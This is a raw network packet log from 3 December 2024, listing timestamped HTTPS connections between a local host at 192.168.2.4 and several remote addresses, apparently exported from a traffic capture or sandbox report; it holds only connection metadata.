                                                                                                                      Dec 3, 2024 08:55:02.343791962 CET49795443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:02.343822956 CET4434979513.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:02.344372988 CET49795443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:02.344378948 CET4434979513.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:02.384397030 CET4434979813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:02.385545969 CET49798443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:02.385617018 CET4434979813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:02.386264086 CET49798443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:02.386269093 CET4434979813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:02.402169943 CET4434979713.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:02.402538061 CET4434979613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:02.402694941 CET49797443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:02.402704954 CET4434979713.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:02.403255939 CET49797443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:02.403260946 CET4434979713.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:02.403286934 CET49796443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:02.403331041 CET4434979613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:02.403675079 CET49796443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:02.403681993 CET4434979613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:02.476772070 CET4434979413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:02.476861954 CET4434979413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:02.476922989 CET49794443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:02.477149963 CET49794443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:02.477179050 CET4434979413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:02.477195978 CET49794443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:02.477200985 CET4434979413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:02.480132103 CET49799443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:02.480175018 CET4434979913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:02.480268002 CET49799443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:02.480415106 CET49799443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:02.480427027 CET4434979913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:02.797203064 CET4434979513.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:02.797276974 CET4434979513.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:02.797332048 CET49795443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:02.797564983 CET49795443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:02.797584057 CET4434979513.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:02.797595024 CET49795443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:02.797600985 CET4434979513.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:02.801026106 CET49800443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:02.801063061 CET4434980013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:02.801132917 CET49800443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:02.801384926 CET49800443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:02.801398993 CET4434980013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:02.819715023 CET4434979813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:02.819777966 CET4434979813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:02.819819927 CET49798443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:02.820087910 CET49798443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:02.820102930 CET4434979813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:02.820116043 CET49798443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:02.820120096 CET4434979813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:02.823574066 CET49801443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:02.823606014 CET4434980113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:02.823666096 CET49801443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:02.823829889 CET49801443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:02.823841095 CET4434980113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:02.846493959 CET4434979613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:02.846580982 CET4434979613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:02.846630096 CET49796443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:02.847032070 CET4434979713.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:02.847085953 CET4434979713.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:02.847127914 CET49797443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:02.847157955 CET49796443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:02.847173929 CET4434979613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:02.847183943 CET49796443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:02.847188950 CET4434979613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:02.847673893 CET49797443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:02.847695112 CET4434979713.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:02.847708941 CET49797443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:02.847714901 CET4434979713.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:02.850667953 CET49802443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:02.850698948 CET4434980213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:02.850781918 CET49802443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:02.850958109 CET49802443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:02.850972891 CET4434980213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:02.851140022 CET49803443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:02.851166964 CET4434980313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:02.851221085 CET49803443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:02.851370096 CET49803443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:02.851385117 CET4434980313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:02.906091928 CET4434976613.227.8.72192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:02.906164885 CET4434976613.227.8.72192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:02.906244040 CET49766443192.168.2.413.227.8.72
                                                                                                                      Dec 3, 2024 08:55:04.262290001 CET4434979913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:04.262872934 CET49799443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:04.262901068 CET4434979913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:04.263416052 CET49799443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:04.263420105 CET4434979913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:04.519871950 CET4434980013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:04.520647049 CET49800443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:04.520683050 CET4434980013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:04.521102905 CET49800443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:04.521109104 CET4434980013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:04.586127043 CET4434980213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:04.586827993 CET49802443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:04.586863041 CET4434980213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:04.587364912 CET49802443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:04.587374926 CET4434980213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:04.606015921 CET49766443192.168.2.413.227.8.72
                                                                                                                      Dec 3, 2024 08:55:04.606055975 CET4434976613.227.8.72192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:04.620055914 CET4434980113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:04.620732069 CET49801443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:04.620770931 CET4434980113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:04.621244907 CET49801443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:04.621252060 CET4434980113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:04.707075119 CET4434979913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:04.707151890 CET4434979913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:04.707308054 CET49799443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:04.707473040 CET49799443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:04.707501888 CET4434979913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:04.707514048 CET49799443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:04.707520008 CET4434979913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:04.711041927 CET49804443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:04.711102962 CET4434980413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:04.711178064 CET49804443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:04.711363077 CET49804443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:04.711381912 CET4434980413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:04.726587057 CET4434980313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:04.727080107 CET49803443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:04.727114916 CET4434980313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:04.727663994 CET49803443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:04.727669001 CET4434980313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:04.777621984 CET49805443192.168.2.4142.250.181.100
                                                                                                                      Dec 3, 2024 08:55:04.777662039 CET44349805142.250.181.100192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:04.777846098 CET49805443192.168.2.4142.250.181.100
                                                                                                                      Dec 3, 2024 08:55:04.777990103 CET49805443192.168.2.4142.250.181.100
                                                                                                                      Dec 3, 2024 08:55:04.778002024 CET44349805142.250.181.100192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:04.955612898 CET4434980013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:04.955677986 CET4434980013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:04.955753088 CET49800443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:04.956160069 CET49800443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:04.956160069 CET49800443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:04.956188917 CET4434980013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:04.956201077 CET4434980013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:04.959317923 CET49806443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:04.959367037 CET4434980613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:04.959458113 CET49806443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:04.959696054 CET49806443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:04.959713936 CET4434980613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:04.998596907 CET49807443192.168.2.4149.154.167.220
                                                                                                                      Dec 3, 2024 08:55:04.998648882 CET44349807149.154.167.220192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:04.998816967 CET49807443192.168.2.4149.154.167.220
                                                                                                                      Dec 3, 2024 08:55:04.999083042 CET49807443192.168.2.4149.154.167.220
                                                                                                                      Dec 3, 2024 08:55:04.999094009 CET44349807149.154.167.220192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:05.024136066 CET4434980213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:05.024214983 CET4434980213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:05.024267912 CET49802443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:05.024491072 CET49802443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:05.024504900 CET4434980213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:05.024518013 CET49802443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:05.024523973 CET4434980213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:05.028022051 CET49808443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:05.028073072 CET4434980813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:05.028161049 CET49808443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:05.028363943 CET49808443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:05.028378010 CET4434980813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:05.064030886 CET4434980113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:05.064100981 CET4434980113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:05.064265966 CET49801443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:05.064410925 CET49801443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:05.064435005 CET4434980113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:05.064445972 CET49801443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:05.064451933 CET4434980113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:05.067614079 CET49809443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:05.067660093 CET4434980913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:05.067748070 CET49809443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:05.067933083 CET49809443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:05.067948103 CET4434980913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:05.180515051 CET4434980313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:05.180584908 CET4434980313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:05.180643082 CET49803443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:05.180888891 CET49803443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:05.180917978 CET4434980313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:05.180942059 CET49803443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:05.180948019 CET4434980313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:05.184597015 CET49810443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:05.184623003 CET4434981013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:05.184689045 CET49810443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:05.184844971 CET49810443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:05.184859037 CET4434981013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:06.407618999 CET44349807149.154.167.220192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:06.408060074 CET49807443192.168.2.4149.154.167.220
                                                                                                                      Dec 3, 2024 08:55:06.408087969 CET44349807149.154.167.220192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:06.408407927 CET44349807149.154.167.220192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:06.408833981 CET49807443192.168.2.4149.154.167.220
                                                                                                                      Dec 3, 2024 08:55:06.408895016 CET44349807149.154.167.220192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:06.409107924 CET49807443192.168.2.4149.154.167.220
                                                                                                                      Dec 3, 2024 08:55:06.451335907 CET44349807149.154.167.220192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:06.558520079 CET4434980413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:06.563597918 CET44349805142.250.181.100192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:06.612379074 CET49805443192.168.2.4142.250.181.100
                                                                                                                      Dec 3, 2024 08:55:06.612384081 CET49804443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:06.616713047 CET49805443192.168.2.4142.250.181.100
                                                                                                                      Dec 3, 2024 08:55:06.616734982 CET44349805142.250.181.100192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:06.617099047 CET49804443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:06.617120981 CET4434980413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:06.617286921 CET44349805142.250.181.100192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:06.617795944 CET49804443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:06.617803097 CET4434980413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:06.617964029 CET49805443192.168.2.4142.250.181.100
                                                                                                                      Dec 3, 2024 08:55:06.618045092 CET44349805142.250.181.100192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:06.670586109 CET49805443192.168.2.4142.250.181.100
                                                                                                                      Dec 3, 2024 08:55:06.739775896 CET4434980613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:06.754369974 CET49806443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:06.754406929 CET4434980613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:06.765012980 CET49806443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:06.765024900 CET4434980613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:06.857928038 CET4434980913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:06.858879089 CET49809443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:06.858915091 CET4434980913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:06.859726906 CET49809443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:06.859734058 CET4434980913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:06.876405954 CET4434980813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:06.876852989 CET49808443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:06.876885891 CET4434980813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:06.877279043 CET49808443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:06.877285004 CET4434980813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:06.928631067 CET44349807149.154.167.220192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:06.928699970 CET44349807149.154.167.220192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:06.928744078 CET49807443192.168.2.4149.154.167.220
                                                                                                                      Dec 3, 2024 08:55:06.929663897 CET49807443192.168.2.4149.154.167.220
                                                                                                                      Dec 3, 2024 08:55:06.929691076 CET44349807149.154.167.220192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:06.932418108 CET49811443192.168.2.4149.154.167.220
                                                                                                                      Dec 3, 2024 08:55:06.932451010 CET44349811149.154.167.220192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:06.932514906 CET49811443192.168.2.4149.154.167.220
                                                                                                                      Dec 3, 2024 08:55:06.937268019 CET49811443192.168.2.4149.154.167.220
                                                                                                                      Dec 3, 2024 08:55:06.937282085 CET44349811149.154.167.220192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:06.966182947 CET4434981013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:06.966993093 CET49810443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:06.967006922 CET4434981013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:06.967485905 CET49810443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:06.967490911 CET4434981013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:07.012912989 CET4434980413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:07.012980938 CET4434980413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:07.013047934 CET49804443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:07.013799906 CET49804443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:07.013818979 CET4434980413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:07.013830900 CET49804443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:07.013837099 CET4434980413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:07.017729044 CET49812443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:07.017779112 CET4434981213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:07.017846107 CET49812443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:07.018084049 CET49812443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:07.018098116 CET4434981213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:07.159095049 CET49813443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:07.159143925 CET44349813196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:07.159286022 CET49813443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:07.159754992 CET49814443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:07.159789085 CET44349814196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:07.159862041 CET49814443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:07.159977913 CET49813443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:07.159993887 CET44349813196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:07.160197020 CET49814443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:07.160207033 CET44349814196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:07.184185982 CET4434980613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:07.184254885 CET4434980613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:07.184340954 CET49806443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:07.184617996 CET49806443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:07.184633970 CET4434980613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:07.184643984 CET49806443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:07.184648991 CET4434980613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:07.188067913 CET49815443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:07.188082933 CET4434981513.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:07.188165903 CET49815443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:07.188389063 CET49815443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:07.188402891 CET4434981513.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:07.301726103 CET4434980913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:07.301796913 CET4434980913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:07.301852942 CET49809443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:07.302089930 CET49809443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:07.302110910 CET4434980913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:07.302123070 CET49809443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:07.302129030 CET4434980913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:07.305454969 CET49816443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:07.305488110 CET4434981613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:07.305578947 CET49816443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:07.305763960 CET49816443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:07.305778027 CET4434981613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:07.338551044 CET4434980813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:07.338617086 CET4434980813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:07.338674068 CET49808443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:07.338851929 CET49808443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:07.338872910 CET4434980813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:07.338886976 CET49808443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:07.338891983 CET4434980813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:07.341713905 CET49817443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:07.341748953 CET4434981713.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:07.341835976 CET49817443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:07.342008114 CET49817443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:07.342026949 CET4434981713.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:07.410809994 CET4434981013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:07.410883904 CET4434981013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:07.410940886 CET49810443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:07.411139965 CET49810443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:07.411158085 CET4434981013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:07.411169052 CET49810443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:07.411174059 CET4434981013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:07.414125919 CET49818443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:07.414160013 CET4434981813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:07.414237022 CET49818443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:07.414408922 CET49818443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:07.414422035 CET4434981813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:08.344041109 CET44349811149.154.167.220192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:08.344394922 CET49811443192.168.2.4149.154.167.220
                                                                                                                      Dec 3, 2024 08:55:08.344413042 CET44349811149.154.167.220192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:08.344722986 CET44349811149.154.167.220192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:08.345030069 CET49811443192.168.2.4149.154.167.220
                                                                                                                      Dec 3, 2024 08:55:08.345082998 CET44349811149.154.167.220192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:08.345168114 CET49811443192.168.2.4149.154.167.220
                                                                                                                      Dec 3, 2024 08:55:08.391325951 CET44349811149.154.167.220192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:08.800477982 CET4434981213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:08.801115990 CET49812443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:08.801146030 CET4434981213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:08.801594973 CET49812443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:08.801599979 CET4434981213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:08.919606924 CET44349814196.22.142.143192.168.2.4
